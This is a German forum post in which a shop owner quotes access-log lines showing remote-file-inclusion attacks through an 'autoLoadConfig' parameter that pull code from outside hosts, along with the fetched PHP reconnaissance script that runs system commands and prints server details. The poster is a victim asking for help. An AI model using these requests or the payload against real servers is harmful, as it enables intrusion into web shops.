Hallo,
Es häufen sich massive Angriffe auf den Shop, wie ich glaube. In den Logfiles tauchen folgende Dinge immer wieder auf:
oder
die zweite datei hab ich mal aufgerufen:
Was hat das zu bedeuten? und ist das gefährlich, oder sind das nur unausgereifte Skript Kiddies, die nach ungepatchten Shops suchen?
Wie würdet ihr vorgehen?
Gruß
Austin
Es häufen sich massive Angriffe auf den Shop, wie ich glaube. In den Logfiles tauchen folgende Dinge immer wieder auf:
Code:
[15/Jul/2008:01:13:46 +0200] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT???
Code:
GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt???
Code:
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Naiz was here ..
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;
Wie würdet ihr vorgehen?
Gruß
Austin
Kommentar